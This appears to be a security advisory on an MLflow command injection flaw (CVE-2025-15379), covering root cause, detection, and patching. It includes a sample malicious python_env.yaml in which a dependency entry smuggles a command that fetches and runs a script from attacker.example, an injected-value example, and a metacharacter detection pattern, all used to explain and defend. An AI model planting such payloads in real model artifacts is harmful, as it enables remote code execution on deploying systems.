CVE-2025-15379 Overview
A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the _install_model_dependencies_to_env() function. When deploying a model with env_manager=LOCAL, MLflow reads dependency specifications from the model artifact's python_env.yaml file and directly interpolates them into a shell command without sanitization. This allows an attacker to supply a malicious model artifact and achieve arbitrary command execution on systems that deploy the model.
Critical Impact
This vulnerability enables attackers to achieve arbitrary command execution on systems deploying malicious model artifacts, potentially compromising the entire ML infrastructure and any connected systems.
Affected Products
- MLflow version 3.8.0
- MLflow deployments using env_manager=LOCAL configuration
- Systems loading model artifacts from untrusted sources
Discovery Timeline
- 2026-03-30 - CVE-2025-15379 published to NVD
- 2026-03-30 - Last updated in NVD database
Technical Details for CVE-2025-15379
Vulnerability Analysis
This command injection vulnerability (CWE-77) resides in MLflow's container initialization code, in the _install_model_dependencies_to_env() function. When MLflow deploys a model with env_manager=LOCAL, it reads dependency specifications from the model artifact's python_env.yaml file and interpolates them into a shell command without sanitization or escaping, so attacker-controlled strings in the artifact flow directly into shell execution.
An attacker can craft a malicious model artifact containing specially crafted dependency strings in the python_env.yaml file. When an unsuspecting system attempts to deploy this model, the malicious payload is executed with the privileges of the MLflow process, potentially leading to complete system compromise.
Root Cause
The root cause is improper input validation and lack of sanitization when constructing shell commands from user-supplied data. The _install_model_dependencies_to_env() function directly uses dependency names and versions from python_env.yaml in shell command construction without escaping special characters or validating input format. This is a classic command injection pattern where untrusted data flows directly into shell execution contexts.
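The flawed pattern, and the shlex-based fix, can be sketched in a few lines. The function names and dependency strings below are simplified illustrations, not MLflow's actual code:

```python
import shlex

def build_install_command_unsafe(dependencies):
    # Vulnerable pattern: untrusted strings are interpolated directly into
    # a shell command, so metacharacters like ';' are interpreted as syntax.
    return "pip install " + " ".join(dependencies)

def build_install_command_safe(dependencies):
    # Fixed pattern: shlex.quote() wraps each argument so the shell treats
    # it as a single literal token rather than executable syntax.
    return "pip install " + " ".join(shlex.quote(d) for d in dependencies)

deps = ["numpy==1.26.0", "scipy; touch /tmp/pwned"]
print(build_install_command_unsafe(deps))  # the ';' would split off a second command
print(build_install_command_safe(deps))    # the payload stays quoted as one argument
```

Run with shell=True, the unsafe string executes pip and then the injected command; the quoted version hands the whole payload to pip as a single (failing) package name.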
Attack Vector
The attack is network-accessible and requires no authentication; the only interaction needed is for a victim system to deploy the attacker's model. An attacker can:
- Create a malicious MLflow model artifact with a crafted python_env.yaml file
- Host or distribute the malicious model through model registries, shared storage, or supply chain compromise
- Wait for a target system to deploy the model using env_manager=LOCAL
- The injected commands execute automatically during the dependency installation phase
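To make the vector concrete, here is a hypothetical malicious python_env.yaml, reproduced as a Python string so the vulnerable interpolation can be shown end to end. The host attacker.example and all dependency strings are invented for illustration, and the injected command is only a stand-in for an arbitrary payload:

```python
# Hypothetical contents of a malicious python_env.yaml (simplified):
# the second "dependency" smuggles a shell command behind a semicolon.
MALICIOUS_PYTHON_ENV = """\
python: "3.10"
dependencies:
  - numpy==1.26.0
  - "requests; curl http://attacker.example/implant.sh | sh #"
"""

# Minimal parse of the dependency list, then the vulnerable interpolation:
deps = []
for line in MALICIOUS_PYTHON_ENV.splitlines():
    entry = line.strip()
    if entry.startswith("- "):
        deps.append(entry[2:].strip('"'))

command = f"pip install {' '.join(deps)}"
print(command)
# Executed with shell=True, everything after the ';' runs as its own command.
```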
The security patch demonstrates the fix by importing the shlex module to properly escape shell arguments:
import logging
import multiprocessing
import os
+import shlex
import shutil
import signal
import sys
Source: GitHub Commit
Detection Methods for CVE-2025-15379
Indicators of Compromise
- Unusual process spawning from MLflow model serving containers
- Unexpected network connections originating from ML inference endpoints
- Suspicious entries in python_env.yaml files containing shell metacharacters such as ;, |, $(), or backticks
- Anomalous system commands executed during model deployment phases
Detection Strategies
- Monitor model artifact integrity by implementing checksum verification for python_env.yaml files
- Deploy file integrity monitoring on MLflow model directories to detect unauthorized modifications
- Implement runtime application self-protection (RASP) to detect command injection patterns during model loading
- Review model artifacts for suspicious dependency strings before deployment
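The artifact-review step can be automated with a small pre-deployment scan. This is a minimal sketch, not a complete validator; the pattern mirrors the metacharacters listed under indicators of compromise, and note that a ';' can also appear in a legitimate PEP 508 environment marker, so hits should be treated as review candidates rather than automatic rejections:

```python
import re
from pathlib import Path

# Metacharacters from the indicator list above: ';', '|', backticks, '$('.
SUSPICIOUS = re.compile(r"[;|`]|\$\(")

def scan_python_env(path: str) -> list[str]:
    """Return the lines of a python_env.yaml that contain shell metacharacters."""
    findings = []
    for lineno, line in enumerate(Path(path).read_text().splitlines(), start=1):
        if SUSPICIOUS.search(line):
            findings.append(f"{path}:{lineno}: {line.strip()}")
    return findings
```

A deployment pipeline could run this over every incoming artifact and hold any model whose python_env.yaml produces findings for manual review.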
Monitoring Recommendations
- Enable comprehensive logging for MLflow model deployment operations
- Monitor process execution trees for child processes spawned during model initialization
- Implement network segmentation alerts for ML serving containers making unexpected outbound connections
- Configure SentinelOne to monitor for suspicious command-line patterns in Python processes
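On the process-monitoring side, Python's own audit hooks can surface every subprocess spawned by the process hosting the model. A sketch follows; the event names are standard CPython audit events, while the log format is illustrative:

```python
import sys

spawned = []  # record of (event, args) for spawned commands

def audit(event, args):
    # CPython raises "subprocess.Popen" (and "os.system") audit events
    # whenever a child process is about to be started.
    if event in ("subprocess.Popen", "os.system"):
        spawned.append((event, args))
        print(f"[audit] {event}: {args}", file=sys.stderr)

# Audit hooks cannot be removed once installed, so register once at startup.
sys.addaudithook(audit)
```

Installed before model loading, the hook makes any dependency-install command, including an injected one, show up in the serving logs.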
How to Mitigate CVE-2025-15379
Immediate Actions Required
- Upgrade MLflow to version 3.8.2 or later immediately
- Audit all existing model artifacts for suspicious python_env.yaml contents
- Restrict model loading to trusted, verified sources only
- Implement strict network segmentation for ML serving infrastructure
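The upgrade check itself is easy to automate. A minimal sketch using only the standard library: it assumes MLflow is installed in the environment being audited, and the simple numeric parse drops pre-release suffixes, which errs on the side of reporting "unpatched":

```python
from importlib.metadata import PackageNotFoundError, version

PATCHED = (3, 8, 2)  # first fixed release per the advisory

def parse_version(v: str) -> tuple[int, ...]:
    # Best-effort numeric parse; non-numeric parts (e.g. "2rc1") are dropped,
    # so pre-releases compare as older than the fix.
    return tuple(int(p) for p in v.split(".")[:3] if p.isdigit())

def mlflow_is_patched() -> bool:
    """True if the installed MLflow is at or above the fixed release."""
    try:
        installed = version("mlflow")
    except PackageNotFoundError:
        return False  # not installed: nothing to serve, nothing to patch
    return parse_version(installed) >= PATCHED
```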
Patch Information
MLflow has addressed this vulnerability in version 3.8.2. The fix introduces proper shell argument escaping using the shlex module to sanitize dependency specifications before shell command construction. Organizations should upgrade immediately to the patched version.
For more details, see the GitHub security commit and the Huntr vulnerability disclosure.
Workarounds
- Avoid using env_manager=LOCAL configuration until patching is complete
- Implement strict model artifact validation pipelines that reject artifacts containing shell metacharacters in python_env.yaml
- Deploy models only from trusted, cryptographically signed sources
- Use containerized deployment with minimal privileges and network isolation
# Configuration example: restrict MLflow model loading to a trusted server
# Point deployments at a vetted internal tracking server
export MLFLOW_TRACKING_URI="https://secure-mlflow-server.internal"
# Use the virtualenv environment manager instead of LOCAL to avoid the vulnerable code path
mlflow models serve -m models:/MyModel/Production --env-manager=virtualenv


